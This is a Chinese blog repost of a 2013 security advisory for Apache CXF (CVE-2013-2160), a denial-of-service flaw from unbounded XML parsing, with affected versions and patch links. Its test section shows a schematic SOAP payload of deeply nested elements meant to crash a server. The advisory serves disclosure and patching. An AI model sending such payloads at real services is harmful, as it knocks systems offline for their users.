Apache CXF多个远程拒绝服务漏洞(CVE-2013-2160)

最新推荐文章于 2024-07-08 09:24:04 发布
最新推荐文章于 2024-07-08 09:24:04 发布
阅读量443 收藏
点赞数
文章标签: 前端 ViewUI
原文链接:http://www.cnblogs.com/security4399/p/3185094.html
版权
漏洞版本:
Apache Group CXF <= 2.5.10
Apache Group CXF 2.7.4
Apache Group CXF 2.6.7
漏洞描述:
BUGTRAQ  ID: 61030
CVE(CAN) ID: CVE-2013-2160

Apache CXF是一个开源服务框架,用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。

Apache CXF 2.5.10, 2.6.7, 2.7.4存在多个远程拒绝服务漏洞,流XML解析器没有限制元素数、属性数、接收文档嵌套结构等,攻击者利用这些漏洞可造成应用崩溃,导致拒绝服务。
<* 参考
http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&amp;amp;modificationDate=1372
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. <?xml version='1.0'?>
  2. <soap:Envelopexmlns:soap='http://www.example.com/2003/05/soap-envelope';>
  3. <soap:Body>
  4. <element>
  5. <element>
  6. <element>
  7. <element>
  8. [thousands more]
  9. </element>
  10. </element>
  11. </element>
  12. </element>
  13. </soap:Body>
  14. </soap:Envelope>
安全建议:
厂商补丁:

Apache Group
------------
Apache Group已经为此发布了一个安全公告(CVE-2013-2160)以及相应补丁:
CVE-2013-2160:Denial of Service Attacks on Apache CXF
链接:http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&modificationDate=1372

转载于:https://www.cnblogs.com/security4399/p/3185094.html

weixin_30426879
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF漏洞剖析
zmzsg100的专栏
12-04 866
CSRF的前世今生
Apache CXF Aegis databinding SSRF 高危漏洞修复
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
05-23 1291
2、Spring Web UriComponentsBuilder URL解析不当漏洞修复。Spring Web UriComponentsBuilder URL解析不当漏洞。1、Apache CXF Aegis databinding SSRF漏洞修复。Apache CXF Aegis databinding SSRF漏洞。进入服务器搜索 databinding。三、maven包升级版本查询。如搜索spring-boot。找到了spring-web。发现版本是3.1.6。果断升级到3.5.8。
中间件安全—Apache常见漏洞
最新发布
Innocence_0的博客
07-08 884
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
使用CXF service 时容易出现的异常
躺在向日葵上睡觉
04-09 343
  问题一:Could not find destination factory for transport   需要加入cxf-rt-transports-http-jetty的jar包,以下是maven中的配置 &lt;dependency&gt; &lt;groupId&gt;org.apache.cxf&lt;/groupId&gt; ...
mysql 0231_Apache HTTP Server远程拒绝服务漏洞(CVE-2014-0231)
weixin_30780735的博客
02-07 246
发布日期:2014-07-15更新日期:2014-07-21受影响系统:Apache Group HTTP Server 2.4.6 - 2.4.9描述:--------------------------------------------------------------------------------BUGTRAQ ID: 68742CVE(CAN) ID: CVE-2014-023...
Apache Log4Net远程拒绝服务漏洞
heimen的专栏
04-01 2557
发布时间:2006-3-15 14:09:37文章作者:ADLab文章来源:启明星辰   BUGTRAQ ID: 17095CVE ID: CVE-2006-0743CNCVE ID:CNCVE-20060743漏洞消息时间:2006-03-14漏洞起因设计错误影响系统Apache Software
apache-cxf-3.5.0.zip
03-01
"apache-cxf-3.5.0.zip" 文件包含了CXF框架的3.5.0版本,该版本可能包含了一些新特性、改进和错误修复。 1. **Apache CXF 框架概述** Apache CXF 是基于Java的,它允许开发者以Java编程语言来创建并暴露Web服务。...
cxf框架包 apache-cxf-3.4.3.tar.gz
04-16
在本案例中,我们讨论的是"apache-cxf-3.4.3.tar.gz",这是Apache CXF 3.4.3版本的压缩包,通常包含了CXF框架的所有组件和必要的库文件。 **1. CXF框架介绍** Apache CXF是一个全面的服务开发框架,它的全称是...
apache-cxf-2.4.1.rar_apache-cxf-2.4.1_cxf_web service
09-24
这个"apache-cxf-2.4.1.rar"压缩包包含了CXF框架的2.4.1版本,这是一个在2010年左右发布的稳定版本。CXF这个名字是"CXF =CX+XF"的缩写,其中"CX"代表了"Client eXtension Framework",而"XF"则代表了"XFire",它是...
apache-cxf-3.0.16-jar.zip
07-08
//第三方系统的webservice参数个数 Object[] obj = new Object[2]; obj[0]="CxfWebservice"; obj[1]="192.168.0.163"; Object[] response = client.invoke("sayHi",obj); System.out.println("调用...
webservice 暴漏接口_WebService小白学习 之 使用CXF工具暴露接口 (2)
weixin_39621235的博客
12-19 544
本篇介绍使用CXF工具暴露接口,不过多介绍,主要看代码。实现过程:1、在pom.xml添加CXF需要jar包:org.apache.cxfcxf-core3.2.5org.apache.cxfcxf-rt-frontend-jaxws3.2.5org.apache.cxfcxf-rt-transports-http-jetty3.2.52、改动上篇的Server.java代码即可:package ...
OA-V5-Webservice安全问题
03-15
解决OA-V5-Webservice安全问题,V5的BUG问题可以通过这个解决;
webservice 密码弱口令漏洞病毒防御介绍
04-23
webservice 如果默认为弱口令,很可能被上传病毒文件,此文档较详细的介绍了病毒的特性和病毒的查杀和防御问题。
CXF WEBSERVICE 安全验证
jxdwuao的专栏
06-27 507
CXF 封装的接口,不希望对外暴露 WSDL结构,找到的CXF安全认证技术都是基于拦截器,在调用的时候返回认证错误信息, 不能保护WSDL不被看到,后来看到别人的一个实现方式最简单有效,基于URL拦截的安全保护,用FILTER。现在把这2种安全保护都记录下来,备用。 WSDL保护: 参考:http://www.myexception.cn/open-source/1505475.html ...
CXF下的保护暴露在外的web service的方法及注意事项
做最好的自己
05-19 532
最近这几天都在使用CXF作为webservice的组件,试图将公开的webservice加入到保护的范围内。 添加到保护的方法有三种: (1)指定地址访问,即指定一些IP地址,只有这些地址的请求我们的接口才处理。 这种方法我在开发中有使用到,可以通过WEB容器中的Filter类来实现, 只需要检查请求的地址是否在我们指定的地址列表中就可以了。 优点:处于请求响应链的前...
CXF隐藏服务列表
I want to know a little more.
03-24 1335
默认情况CXF会暴露webservice的接口,可能会被黑客利用并攻击,所以为了隐藏service list,可以如下配置: <servlet> <servlet-name>CXFServlet</servlet-name> <servlet-class>org.apache.cxf.transport.servlet.CXFSer...
解决cxf Available SOAP services暴漏其他接口
J.G.Darkd
06-30 3706
[code="java"] CXFServlet org.apache.cxf.transport.servlet.CXFServlet Hides the listing of available services when set to true. It is considered a security...
Cxf技巧之隐藏服务列表
夫礼者的专栏
01-21 4445
最近接到的需求,要求隐藏服务请求列表清单,增加安全性。 1. 方法一:直接隐藏服务列表 经过翻阅相关资料和源码,最终了CXF内置的支持——通过设置hide-service-list-page的Servlet初始化参数即可达到目的(该参数的读取和生效是在ServletController类中完成的)。 具体的配置方式如下(根据具体的环境任选其一): web.xml &amp;amp;lt;servlet&amp;amp;g...
CXF-06:Web Service暴露后如何进行权限控制,CXF拦截器的理论以及如何为CXF的客户端和服务器端添加拦截器
乘风晓栈的博客
10-15 1684
Web Service暴露后所有人都可以调用,如何进行权限控制? 解决思路是:服务器端要求input消息总是携带有用户名、密码信息,————如果没有或不正确,拒绝调用。 * 如果不用CXF等框架,SOAP消息的生成、解析都是程序员负责的,因此无论是添加用户名、密码信息,还是提取用户名、密码信息,都可由程序员的代码完成; * 如果用CXF等框架,SOAP消息的生成、解析都是CXF等框架来完成的,为了让程序员能访问并修改CXF框架所生成的SOAP消息,CXF提供了拦截器;
Apache CXF:构建高效Web服务
Apache CXF 是一个开源的Web服务框架,它允许开发者创建和消费SOAP(Simple Object Access Protocol)和RESTful(Representational State Transfer)Web服务。这个框架强调面向接口的编程思想,这使得代码更易于维护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值